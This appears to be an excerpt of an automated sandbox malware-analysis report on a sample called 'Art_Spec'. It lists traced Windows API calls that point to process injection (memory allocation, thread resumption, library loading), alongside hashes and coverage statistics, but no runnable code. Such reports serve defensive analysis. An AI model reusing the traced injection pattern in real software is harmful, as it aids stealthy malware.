                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 144134e3ca09d5fd066bbd03b6b714d6451d55b187a0d7ee12bf11d6389c2919
                                                        • Instruction ID: aaa67d7861c625a160753fd5755d0f9c364937111d8bc1e269dd4010c64d542b
                                                        • Opcode Fuzzy Hash: 144134e3ca09d5fd066bbd03b6b714d6451d55b187a0d7ee12bf11d6389c2919
                                                        • Instruction Fuzzy Hash: 191167718002499FDB10DFAAC844BEFBBF5EF48320F24842EE515A7251C775A900CFA1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: f0c534a5c948869ee54afd2a9094639e9d57a101c5dd8eef3c1568a61e4a65d1
                                                        • Instruction ID: 9df139f3f9a5fedc058ad79afdb65504a9aba053c7a40f2eed2d1a7f5306ab09
                                                        • Opcode Fuzzy Hash: f0c534a5c948869ee54afd2a9094639e9d57a101c5dd8eef3c1568a61e4a65d1
                                                        • Instruction Fuzzy Hash: 331167B1C002498FDB20DFAAD4447AEBBF5EB88324F64842DD559A7340DA74A901CFA4
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A7B079,00000800,00000000,00000000), ref: 00A7B28A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 4812f94ae320ae614d711c477a896c4e95bcd965e8c8eb9db2728189105ba82f
                                                        • Instruction ID: 5eeca473c667a71bf0740f3488ac9490ba4c839134e7acb787c02c7a0a1e9efc
                                                        • Opcode Fuzzy Hash: 4812f94ae320ae614d711c477a896c4e95bcd965e8c8eb9db2728189105ba82f
                                                        • Instruction Fuzzy Hash: 861103B69003099FDB10CF9AD844BDEFBF4EB48710F14842AE519A7210D375A945CFA5
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 047C1BB6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 26eb9eb3c0704c554077c9eb3543a237e3fe2955d365d7812fc730d836ef682c
                                                        • Instruction ID: c4f12a85b9b62fdacc074b065c8d3fccaa83f291524dea82e76b95acff684179
                                                        • Opcode Fuzzy Hash: 26eb9eb3c0704c554077c9eb3543a237e3fe2955d365d7812fc730d836ef682c
                                                        • Instruction Fuzzy Hash: 251137719003499FDB10DFAAD844BDFBBF5EF88310F24881AE519A7250D775A950CFA1
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A7B079,00000800,00000000,00000000), ref: 00A7B28A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c02cab4c59b9b23f7809a2f88642dcae023e98918abde94dca1d34f5c9c1ec7
                                                        • Instruction ID: 4d9bdbf74e1c476fa93cd9862e635c3743ebc487283b2813f3625f7251258346
                                                        • Opcode Fuzzy Hash: 8c02cab4c59b9b23f7809a2f88642dcae023e98918abde94dca1d34f5c9c1ec7
                                                        • Instruction Fuzzy Hash: 4E1112B69002498FDB10CFAAD844BDEFBF4AB88310F14842AD959A7210C375A945CFA5
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 047C4B55
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 6632542825944109b78ff0860dd6fd1c5db01b1b9ccd6b6d0fea7213cf7f5e97
                                                        • Instruction ID: dad62de8ed9992b39324bf6a798bd91732bbcbab08c7ae12d799b89bf1557f6b
                                                        • Opcode Fuzzy Hash: 6632542825944109b78ff0860dd6fd1c5db01b1b9ccd6b6d0fea7213cf7f5e97
                                                        • Instruction Fuzzy Hash: F71132B5C002499FDB10CF99D885BDEBBF4FB48310F20845AD528A7641D374AA44CFA1
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00A7AFFE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: a118f9ae01bdc342c944f5a827797bab04fdba6d59f36f099261f1e9aa2640e2
                                                        • Instruction ID: 732bc042b9b05475ff4ff03b0d96e8a741763e153b52bf47f986a05aea9ad115
                                                        • Opcode Fuzzy Hash: a118f9ae01bdc342c944f5a827797bab04fdba6d59f36f099261f1e9aa2640e2
                                                        • Instruction Fuzzy Hash: CD110FB6C006499FDB10CF9AD844BDEFBF4EB88314F14C45AD529A7210D379A546CFA1
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00A7AFFE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 0a7ce9c97552f681e32fe7651032ccb33e4f8752bd2bd32ac34d3d98ffbf46cf
                                                        • Instruction ID: dcbcbc16ffd85dbef95a7c232c4dc743470b65af5b4e7acde7c1919f7b36658e
                                                        • Opcode Fuzzy Hash: 0a7ce9c97552f681e32fe7651032ccb33e4f8752bd2bd32ac34d3d98ffbf46cf
                                                        • Instruction Fuzzy Hash: 93110FB5C006498FDB10CF9AD844B9EFBF4AB88314F10C41AD429A7210D379A545CFA1
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 047C4B55
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: e994a9cfe1892587197170673a70af34cfa88138c871edce1331f02eb0fc98d7
                                                        • Instruction ID: 24df8705c6165e9006e658d3a30bd918e2773e0abd73ee9f23fd2decd81a4800
                                                        • Opcode Fuzzy Hash: e994a9cfe1892587197170673a70af34cfa88138c871edce1331f02eb0fc98d7
                                                        • Instruction Fuzzy Hash: 6711F2B59007499FDB10DF9AD888BDEBBF8EB48310F10845EE528A7700D375A944CFA5
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 3ae2e85322c66f2af77f58249757780f9d7d493402611ac9dbb007446d026d4f
                                                        • Instruction ID: d92be83c1d857f7d69f17c8f55bae839266ce37b49e44871b7457046554ae6a1
                                                        • Opcode Fuzzy Hash: 3ae2e85322c66f2af77f58249757780f9d7d493402611ac9dbb007446d026d4f
                                                        • Instruction Fuzzy Hash: C10108B08007498FDB24DFAAC4457AFBBF4EB48714F24841DD519A7240C778A544CFA5
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9b31bad3e5d6eb0f96c4d965fb2c37b7b820b0d943b1868179f970c6fb30aa6
                                                        • Instruction ID: 1bd309a11378aea182b073a9f5acd8e70b663991ea955c4f929f408ff5cc8335
                                                        • Opcode Fuzzy Hash: a9b31bad3e5d6eb0f96c4d965fb2c37b7b820b0d943b1868179f970c6fb30aa6
                                                        • Instruction Fuzzy Hash: B311D376904284CFCB15CF14D9C4B16BF71FB94314F24C6ADE8490B65AC33AD95ACBA2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a8a6e10cb5fcc05d8f6f095d157469ec99e96dd89e8cf2c0f08afeec15e6667
                                                        • Instruction ID: 5564507a992ec87e0cb15a652865663c7b49ee58d4045fc0c7981e316202f56d
                                                        • Opcode Fuzzy Hash: 9a8a6e10cb5fcc05d8f6f095d157469ec99e96dd89e8cf2c0f08afeec15e6667
                                                        • Instruction Fuzzy Hash: 3721FFB5900749DFDB10DF9AD884ADEBBF8FB48310F10852AE919A7250C374A954CFA5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118381887.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9dd000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c21f20f9b933fcfff6280cc061701e95e78f5f46405777b46ba0931fd6c09a03
                                                        • Instruction ID: 09100e1b26e4809b5224c23f30425bb4d1034c21ff51367f3f31265808738eec
                                                        • Opcode Fuzzy Hash: c21f20f9b933fcfff6280cc061701e95e78f5f46405777b46ba0931fd6c09a03
                                                        • Instruction Fuzzy Hash: 4911BB75544284DFDB01CF10C5C0B15BBB1FB84314F24C6AAD9494B796C33AD80ACB61
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b130e3d58872948975b9706db5c56eae52d8e5a560e885ab8fb1fb8a35e8730
                                                        • Instruction ID: 7389df307d9a3946bb93eb151c2cbf8c1726e8cf15b69728482fa8dec96d4793
                                                        • Opcode Fuzzy Hash: 3b130e3d58872948975b9706db5c56eae52d8e5a560e885ab8fb1fb8a35e8730
                                                        • Instruction Fuzzy Hash: 9801F4313043845BEB266A698C78A3FABAEDFC5160B04147AED06C72C2EE14DC4682B5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 20b1c08bbaf025e366db34f7e20b0af472e10f2c6b7ac29ae5c05a953c2829df
                                                        • Instruction ID: 5af444c25d6f3c0a306a49f6d8402c50ab885d006fddab832547db5fdf476e6e
                                                        • Opcode Fuzzy Hash: 20b1c08bbaf025e366db34f7e20b0af472e10f2c6b7ac29ae5c05a953c2829df
                                                        • Instruction Fuzzy Hash: 0911E574D08209DFCB04DFA9D5A0AADFBFAFB88300F10A595D419A7751D374AA42CB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f93280da44f3826af53da48bef09dd3fc16ed053df5d3321d3e334be71d26ef4
                                                        • Instruction ID: 38f818f39404e2872fd6606879e058c0c8c6aa3ab2367bb7c83be7e658c17b16
                                                        • Opcode Fuzzy Hash: f93280da44f3826af53da48bef09dd3fc16ed053df5d3321d3e334be71d26ef4
                                                        • Instruction Fuzzy Hash: 16012D30756744CFE315CB28C865F55BBB2AF86714F1980E6E1158F6B2DA61DC01CB12
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 718d48479ba922d591ab48da5468f35352fc6d62c151e62658cd9b8c97e3a1ba
                                                        • Instruction ID: b3a0b4d2c9e715d29412a50e81c75b85708c3bab3171876d80b729f5a3d328df
                                                        • Opcode Fuzzy Hash: 718d48479ba922d591ab48da5468f35352fc6d62c151e62658cd9b8c97e3a1ba
                                                        • Instruction Fuzzy Hash: 2C018F30745744DFD314CB18C855F55BB72AF8A724F1A90E5E2058F6B2D662E802CB01
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118329674.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9cd000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fd156b4411dc7d5d0c2c5013a4fa25e9ef46cc9d1bd21f8a8cb3918fda8e3a8f
                                                        • Instruction ID: 6dbf9ad05fdfc4dd53644b22d7668b1d3d14ff4c5dabd6308520474f922a3fc4
                                                        • Opcode Fuzzy Hash: fd156b4411dc7d5d0c2c5013a4fa25e9ef46cc9d1bd21f8a8cb3918fda8e3a8f
                                                        • Instruction Fuzzy Hash: 6B01DBB1906344EAE7209B15DD84F66FFDCEF51720F18896EED095A286C37D9840C673
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 067d3aea194e651cae34a12c5d09e034d3320b141c22d7cfe8d4191d25da723c
                                                        • Instruction ID: 47a027c67f05b5c44527d3ac0138234769f433585179ee2d70d3c144e6d9ea42
                                                        • Opcode Fuzzy Hash: 067d3aea194e651cae34a12c5d09e034d3320b141c22d7cfe8d4191d25da723c
                                                        • Instruction Fuzzy Hash: AFF0E23A7102105BEB1A6A3DE8659AA37EADFC526132541B7E50ACB366DD24DC038391
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5907d5efee07b288f2ea5c5000b608f9c71c101dedaf250a7aa5d6ce32ce8a3f
                                                        • Instruction ID: 51593bea4a5a677b9f66bcfb6de2d93c6979be2f38ef4d02490b3227581c2a4b
                                                        • Opcode Fuzzy Hash: 5907d5efee07b288f2ea5c5000b608f9c71c101dedaf250a7aa5d6ce32ce8a3f
                                                        • Instruction Fuzzy Hash: 69014C71804319DFDB11CF65C8553AEBBB1FF48390F149169E815EA6E4D3B04A55CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c1e65ea672a6671e7abe029eaaed1cc1ff1df9771af25a3e9c0d57b5a058064
                                                        • Instruction ID: 22cec9c3f23b60175ee1ab0d8ac621764586491d5b146dc6a38509cf8c501cb5
                                                        • Opcode Fuzzy Hash: 4c1e65ea672a6671e7abe029eaaed1cc1ff1df9771af25a3e9c0d57b5a058064
                                                        • Instruction Fuzzy Hash: CFF0447090D308DBC704CFE5C460ABEBBFEEB89304F44B995940D57691D7319A46DB40
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d5b07e22ba4905bebf60ae749505b11e90bea5330f4987dc54b911424158686
                                                        • Instruction ID: df9afefa1efef9a55b6fb190f36fbaba02ade0f8f2d6fe83563cef2e2a17784e
                                                        • Opcode Fuzzy Hash: 2d5b07e22ba4905bebf60ae749505b11e90bea5330f4987dc54b911424158686
                                                        • Instruction Fuzzy Hash: 1D01E974D002499FCB40DFA8C490AAEBBF4FB48300F10819AE854E3380D7349A40CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118329674.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9cd000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 802818b9c4e0261d965afa9a3e0d777cb9c50f4814a512cc3b1c06d700cc48b2
                                                        • Instruction ID: 202e94cecf4807cd1e08d914b49c62faa623a57e073cf36b4b0ff6bf8e51d009
                                                        • Opcode Fuzzy Hash: 802818b9c4e0261d965afa9a3e0d777cb9c50f4814a512cc3b1c06d700cc48b2
                                                        • Instruction Fuzzy Hash: 1CF06272405344AEE7208F16DC84B66FBACEF91724F18C55AED495A286C379AC44CAB2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 97a5b92bbf89c08ee398367a00313b46ca1e20bd9a323b57ba9f222b88fe990b
                                                        • Instruction ID: bf9df21144ef6b8789da7ddb4dd148e8ed67acf6b822177456a781c4868c1082
                                                        • Opcode Fuzzy Hash: 97a5b92bbf89c08ee398367a00313b46ca1e20bd9a323b57ba9f222b88fe990b
                                                        • Instruction Fuzzy Hash: 71F0F630A0820ECBD704EB68E4647AE3BBEEB89300F009A25C005A23C5DA71AD429B11
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 92c6502b084e256a8749f007f8caa4198c9f7d49239f2c019148c09b9cd7d2ff
                                                        • Instruction ID: efdcf9e596275fda7638922245df95d686ae06b055fc4358e649e3238b7e569f
                                                        • Opcode Fuzzy Hash: 92c6502b084e256a8749f007f8caa4198c9f7d49239f2c019148c09b9cd7d2ff
                                                        • Instruction Fuzzy Hash: BAF027347002109B9B58AA3EA43482B32EB9FC82603240076E606C7354DD38DC018390
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1de68a2e8e6b049eb3dd3cb54cea2a93d052fc42d1a953ba8a9df0b4f10a65fb
                                                        • Instruction ID: 8e80d29afb1daa71fcbfdfbe97e94d15c6e6a104a6ce49259da7b3abd6c1af65
                                                        • Opcode Fuzzy Hash: 1de68a2e8e6b049eb3dd3cb54cea2a93d052fc42d1a953ba8a9df0b4f10a65fb
                                                        • Instruction Fuzzy Hash: A101FF70800319DFDB14CF55C4157AEBAF5FF44390F14D129E425AA294D7B44A50CFE0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b9d98e973191bf9ec5dc32323bc8dbdb6cdddcef2734144e562b901c10245c4f
                                                        • Instruction ID: fcaeb3376c95e9190c5787a54a83e9841c87d297895b128288a1389ca9bc7b20
                                                        • Opcode Fuzzy Hash: b9d98e973191bf9ec5dc32323bc8dbdb6cdddcef2734144e562b901c10245c4f
                                                        • Instruction Fuzzy Hash: 55F0E2726082486FCF09EF58DC60CAA7FBAEF06224B0581BBF004D7262D631E900C758
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 19693e4e18da096f5a7da1283a537e48d931f32b52eb0538cd0ddc4a9cb87c41
                                                        • Instruction ID: d9f9ce74e1382eb32cbe504f5526ed53882b8a6b1573d087f704c5563f6aeb60
                                                        • Opcode Fuzzy Hash: 19693e4e18da096f5a7da1283a537e48d931f32b52eb0538cd0ddc4a9cb87c41
                                                        • Instruction Fuzzy Hash: 62E06D76B002286F9314DA6EEC84D6BBBEEFBCC670355807AF508C7310D9319C01C6A0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0eab1762629b91cbb35a370b2c4f8bb5f87a9acd245dc035871eef6d771a48e1
                                                        • Instruction ID: dc43245db178687a7ebf4da0e70b266937a39eff2e0640d66425a8ed605c506d
                                                        • Opcode Fuzzy Hash: 0eab1762629b91cbb35a370b2c4f8bb5f87a9acd245dc035871eef6d771a48e1
                                                        • Instruction Fuzzy Hash: 21F01774D042089BD718CFAAD8149AEBBBABFC9300F00D12AE815677A4CB705846CB90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ba9e26bfbfb463e7ca4499a8bb9b8b9520befcc8819717ed5d177c1b61686785
                                                        • Instruction ID: ea5535619c7f8ad74c4f0f9e82dda197611b54b79c81ede7570d2f8d64b92827
                                                        • Opcode Fuzzy Hash: ba9e26bfbfb463e7ca4499a8bb9b8b9520befcc8819717ed5d177c1b61686785
                                                        • Instruction Fuzzy Hash: FFF03974D0120CEFCB54EFA8D404A8DBBB5EB88301F00C0AAA818A3350D734AA51DF81
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 51415fa8837cb084e95acd44c1e8b69ab6e1709dd5c8f73ce6dd1205a332d53f
                                                        • Instruction ID: 4f48f96cc663c4f52e765609d995f7fff641b59671818ab21aea23b805b23257
                                                        • Opcode Fuzzy Hash: 51415fa8837cb084e95acd44c1e8b69ab6e1709dd5c8f73ce6dd1205a332d53f
                                                        • Instruction Fuzzy Hash: 18E0E21629E3D4AFD30B66700CA9558BF308E5320070A90EBD688CA1F3C129891B8767
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 79e38ec4dff4a6a246a358df77c4187df1ea86c54934096ef7afe8d5eb7907d2
                                                        • Instruction ID: a1da2e49822267cd986020a14f0c32187d0d1e86ae57260867d9b1747ab3d07f

                                                        Execution Graph

                                                        Execution Coverage:1.2%
                                                        Dynamic/Decrypted Code Coverage:5%
                                                        Signature Coverage:7.9%
                                                        Total number of Nodes:140
                                                        Total number of Limit Nodes:9

                                                        Control-flow Graph

                                                        control_flow_graph 85 417b13-417b3c call 42e253 88 417b42-417b50 call 42e773 85->88 89 417b3e-417b41 85->89 92 417b60-417b71 call 42cc13 88->92 93 417b52-417b5d call 42ea13 88->93 98 417b73-417b87 LdrLoadDll 92->98 99 417b8a-417b8d 92->99 93->92 98->99
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B85
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                        • Instruction ID: 5084c3d16cd78f6066525c9c02257e451d1bbec126aea60e2d452a5e7d2945bd
                                                        • Opcode Fuzzy Hash: 592690fab9869339d2f3c55b1dab14264bbee20a9bfc6d5bf63f6ddf15c2071a
                                                        • Instruction Fuzzy Hash: 410152B1E4410DB7DF10DAA1DC42FDEB3789B54308F004196E90897240F675EB448B95

                                                        Control-flow Graph

                                                        control_flow_graph 110 42b683-42b6b9 call 404843 call 42c723 NtClose
                                                        APIs
                                                        • NtClose.NTDLL(?,0041674F,001F0001,?,00000000,?,?,00000104), ref: 0042B6B4
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_Art_Spec.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: e3d868196a48d853df1b9d5794ef9ab97ac8e7f0c3363c65e698835d9533e37e
                                                        • Instruction ID: 727abfe5acca37f02523496ed090aec1a3da151eb2021070b30343ae6eafb1de
